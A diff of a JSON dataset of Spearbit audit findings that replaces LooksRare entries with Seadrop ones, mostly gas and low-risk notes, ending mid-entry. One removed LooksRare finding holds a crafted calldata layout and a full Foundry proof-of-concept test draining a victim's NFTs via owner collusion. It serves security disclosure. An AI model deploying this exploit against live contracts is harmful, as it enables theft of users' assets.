"html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above, we are trying to invalidate orders that have 0 amounts or an amount other than 1 when the asset if an ERC721 if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } The above snippet can be simplified into: if (amount == 0 or (amount != 1 and assetType == 0)) { revert OrderInvalid(); }", + "title": "Update the ERC721A library due to an unpadded toString() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a which does not add a trailing zero padding to the returned string. Some projects have had issues reusing the toString() where the off-chain call returned some dirty-bits at the end (similar to Seaport 1.0's name()).", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "_verifyMatchingItemIdsAndAmountsAndPrice can be further optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_verifyMatchingItemIdsAndAmountsAndPrice's validation logic uses more opcodes than is neces- sary. Also, the whole function can be turned into an assembly block to further optimized this function. Examples of simplifications for if conditions or(X, gt(Y, 0)) or(X, Y) // simplified version or(X, iszero(eq(Y,Z))) or(X, xor(Y, Z)) // simplified version The nested if block below if (amount != 1) { if (amount == 0) { revert OrderInvalid(); } if (assetType == 0) { revert OrderInvalid(); } } can be simplified into 33 if (amount == 0) { revert OrderInvalid(); } if ((amount != 1) && (assetType == 0)) { revert OrderInvalid(); }", + "title": "Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There are no checks in Seadrop that prevents minting for the case when quantity == 0. This would call the function mintSeadrop(minter, quantity) for a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0--the correct behaviour. However, there has been instances in the past where ignoring quantity == 0 checks have led to security issues.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Gas Optimization" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "In StrategyFloorFromChainlink premium amounts miss the related checks when compared to checks for discount amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "For discount amounts, StrategyFloorFromChainlink has custom checks for the underflows (even though they will be caught by the compiler): 36 if (floorPrice <= discountAmount) { revert DiscountGreaterThanFloorPrice(); } uint256 desiredPrice = floorPrice - discountAmount; ... // @dev Discount cannot be 100% if (discount >= 10_000) { revert OrderInvalid(); } uint256 desiredPrice = (floorPrice * (10_000 - discount)) / 10_000; Similar checks for overflows for the premium are missing in the execution and validation endpoints (even though they will be caught by the compiler, floorPrice + premium or 10_000 + premium might overflow).", + "title": "Missing parameter in _SIGNED_MINT_TYPEHASH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "A parameter is missing (uint256 maxTokenSupplyForStage) and got caught after reformatting.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink's isMakerBidValid compare the time dependent floorPrice to a fixed discount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When isMakerBidValid gets called depending on the market conditions at that specific time the comparisons between the floorPrice and the discount might cause this function to either return isValid as true or false.", + "title": "Missing address(0) check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "All update functions having an address as an argument check them against address(0). This is missing in updateTokenGatedDrop. This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Low Risk SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968," ] }, { - "title": "StrategyFloorFromChainlink's isMakerAskValid does not validate makerAsk.additionalParameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategy- WithTakerBid, maker needs to make sure to populate its additionalParameters with the premium amount, otherwise the taker's transactions would revert: makerAsk.additionalParameters = abi.encode(premium); isMakerAskValid does not check whether makerAsk.additionalParameters has 32 as its length. For example, the validation endpoint for StrategyCollectionOffer does check this for the merkle root.", + "title": "Missing boundary checks on feeBps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There's a missing check when setting feeBps from ERC721SeaDrop.sol while one exists when the value is used at a later stage in Seadrop.sol, which could cause a InvalidFeeBps error.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink strategies do not check for asset types explicitly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyFloorFromChainlink has 4 different execution endpoints: executeFixedPremiumStrategyWithTakerBid executeBasisPointsPremiumStrategyWithTakerBid executeFixedDiscountCollectionOfferStrategyWithTakerAsk executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk All these endpoints require that only one amount to be passed (asked for or bid on) and that amount would need to be 1. This is in contrast to StrategyCollectionOffer strategy that allows an arbitrary amount (although also required to be only one amount, [a]) Currently, Chainlink only provides price feeds for a selected list of ERC721 collections: https://docs.chain.link/ data-feeds/nft-floor-price/addresses So, if there are no price feeds for ERC1155 (as of now), the transaction would revert. Thus implicitly one can deduce that the chainlink floor strategies are only implemented for ERC721 tokens. Other strategies condition the amounts based on the assetType: 38 assetType == 0 or ERC721 collections can only have 1 as a valid amount assetType == 0 or ERC1155 collections can only have a non-zero number as a valid amount If in the future chainlink or another token-price-feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1.", + "title": "Upgrade openzeppelin/contracts's version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability as ECDSA.recover is used.", + "labels": [ + "Spearbit", + "Seadrop", + "Severity: Low Risk" + ] + }, + { + "title": "struct TokenGatedDropStage is expected to fit into 1 storage slot", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as per announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Low Risk" ] }, { - "title": "itemIds and amounts are redundant fields for takerXxx struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. Most implemented strategies (which are fixed/chosen by the maker through signing the makerXxx which includes the strategyId) require the itemIds and amounts fields for the maker and the taker to mirror each other. i : the j th element of maker's itemIds fields (the struct would be either MakerBid or MakerAsk depending M j on the context) M j a : the j th element of maker's amounts fields (the struct would be either MakerBid or MakerAsk depending on the context) T j i : the j th element of taker's itemIds fields (the struct would be either TakerBid or TakerAsk depending on the context) T j a : the j th element of taker's amounts fields (the struct would be either TakerBid or TakerAsk depending on the context) Borrowing notations also from: \"Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies\" IneheritedStategy : T j i = M j StrategyDutchAuction : T j i , T j i = M j a = M j a i , T j a = M j a , taker can send extra itemIds and amounts but they won't be StrategyUSDDynamicAsk : T j i = M j i , T j a = M j a , taker can send extra itemIds and amounts but they won't be used. used. StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : T 0 i = M 0 i , T 0 a = M 0 a = 1 , taker can send extra itemIds and amounts but they won't be used. StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : T 0 a = M 0 a = 1 , maker's itemIds are unused. StrategyCollectionOffer : T 0 a = M 0 a , maker's itemIds are unused and taker's T i a for i > 0 are also unused. StrategyItemIdsRange : M 0 i (cid:20) T j i (cid:20) M 1 i , P T j a = M 0 a . 39 For IneheritedStategy StrategyDutchAuction StrategyUSDDynamicAsk StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid Shared taker's itemIds and amounts are redundant as they should exactly match maker's fields. For the other strategies, one can encode the required parameters in either maker's or taker's additionalParameters fields.", + "title": "Avoid expensive iterations on removal of list elements by providing the index of element to be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters to avoid looping over all elements. Also note in the case of _removeFromEnumeration(signer, enumeratedStorage), hopefully, there wouldn't be too many signers corresponding to a contract. So practically, this wouldn't be an issue. But something to note. Although the owner or admin can stuff the signer list with a lot of signers as the other person would not be able to remove from the list (DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWith- TakerAsk", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not if discount == 99_99 which almost has the same effect. Note that if discount == 10_000, (forgetting about the revert) price = desiredPrice = 0. So, unless the taker (sender of the transaction) has set its takerAsk.minPrice to 0 (maker is bidding for a 100% discount and taker is gifting the NFT), the transaction would revert: if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0 revert AskTooHigh(); }", + "title": "mintParams.allowedNftToken should be cached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it: // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken;", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Restructure executeMultipleTakerBids's input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "executeMultipleTakerBids has the following form function executeMultipleTakerBids( OrderStructs.TakerBid[] calldata takerBids, OrderStructs.MakerAsk[] calldata makerAsks, bytes[] calldata makerSignatures, OrderStructs.MerkleTree[] calldata merkleTrees, address affiliate, bool isAtomic ) For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkle- Trees all have the same length. We can enforce this requirement by definition, if we restructure the input passed to executeMultipleTakerBids.", + "title": "Immutables which are calculated using keccak256 of a string literal can be made constant.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: Code Generator: Evaluate keccak256 of string literals at compile-time. The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Restructure transferBatchItemsAcrossCollections input parameter format", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "transferBatchItemsAcrossCollections has the following form function transferBatchItemsAcrossCollections( address[] calldata collections, uint256[] calldata assetTypes, address from, address to, uint256[][] calldata itemIds, uint256[][] calldata amounts ) where collections, assetTypes, itemIds and amounts are supposed to have the same lengths. One can enforce that by redefining the input parameter and have this invariant enforced by definition.", + "title": "Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can be combined into just one mapping. The pairs: 1. _allowedFeeRecipients and _enumeratedFeeRecipients 2. _signers and _enumeratedSigners 3. _tokenGatedDrops and _enumeratedTokenGatedTokens Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration. mapping(address => mapping(address => CustomStructOrBool)) private variable; mapping(address => address[]) private _enumeratedVariable;", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "An approved operator can call transferBatchItemsAcrossCollections", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "TransferManager has 3 endpoints that an approved operator can call: transferItemsERC721 transferItemsERC1155 transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: , address transferItemsERC1155 address ,! address[], address[], address, address , uint256[][], uint256[][] // ,! transferBatchItemsAcrossCollections , address, uint256[], uint256[] // transferItemsERC721, 44 An operator like LooksRareProtocol might have an owner ( OL ) that can select/add arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: the protocol would call abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[] ) that when decoded as (address[], address[], address, address, uint256[][], uint256[][]) It would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted paramters | original parameter ,! ; ---------------------------------- ,! -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr ,! 00000000000000000000000000000000000000000000000000000000000000X3 ; from ,! 00000000000000000000000000000000000000000000000000000000000000X4 ; to ,! itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr ,! amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr ,! itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItem- sERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which unless both have length 0 it would cause the compiled code to revert due to out of range index access. This is also dependent on if/how the compiler encodes/decodes the calldata and if the compiler would add the bytecodes for the deployed code to revert for OOR accesses (which solc does). This is just a lucky coincidence otherwise, OT could have exploited this flaw.", + "title": "The onlyAllowedSeaDrop modifier is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdminis- trator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Shared login in different StrategyFloorFromChainlink strategies can be refactored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": " executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid. executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCol- lectionOfferStrategyWithTakerAsk. Each group of endpoints in the above list share the exact same logic. The only difference they have is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. function a1() external view returns () { () = _a1(); // inlined computation of _a1 } function a2() external view returns () { () = _a2(); // inlined computation of _a2 }", + "title": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure. This would reduce storage space and save gas when storing or retrieving parameters.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid.", + "title": ".length should not be looked up in every loop of a for-loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Reading an array's length at each iteration of a loop consumes more gas than necessary.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Creator fee amount and recipient calculation can be refactored in ExecutionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The create fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeS- trategyForTakerBid are identical and can be refactored.", + "title": "A storage pointer should be cached instead of computed multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "The owner can set the selector for a strategy to any bytes4 value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). Even though the following check exists if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } There is no measure taken to avoid potential selector collision with other contract types.", + "title": "Comparing a boolean to a constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "Seadrop", + "Severity: Gas Optimization" ] }, { - "title": "Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies. notation description Ti Ta Mi Ma length of taker's bid (or ask depending on the context) item ids length of taker's bid (or ask depending on the context) amounts length of maker's bid (or ask depending on the context) item ids length of maker's bid (or ask depending on the context) amounts 59 IneheritedStategy : Ti = Ta = Mi = Ma StrategyItemIdsRange : Ti (cid:20) Ta, Mi = 2, Ma = 1 (related issue) StrategyDutchAuction : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma StrategyUSDDynamicAsk: Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma = 1 StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : Ti = 1, 1 = Ta, Ma = 1 StrategyCollectionOffer : Ti = 1, 1 (cid:20) Ta, Ma = 1 The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bound revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function.", + "title": "mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "mintAllowedTokenHolder is stored in a uint40 (after this audit uint32) which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { } revert ManagerSelectorEmpty(); The owner can add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called the provided parameters by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. 60 The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,! 0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = _signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. // it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } }", + "title": "Consider replacing minterIfNotPayer parameter to always correspond to the minter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender would be considered as the minter. Otherwise, minterIfNotPayer would be considered as the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well--we recommend calling it minter afterwards.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "viewCreatorFeeInfo can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "viewCreatorFeeInfo includes a low-level staticcall to collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded.", + "title": "The interface IERC721ContractMetadata does 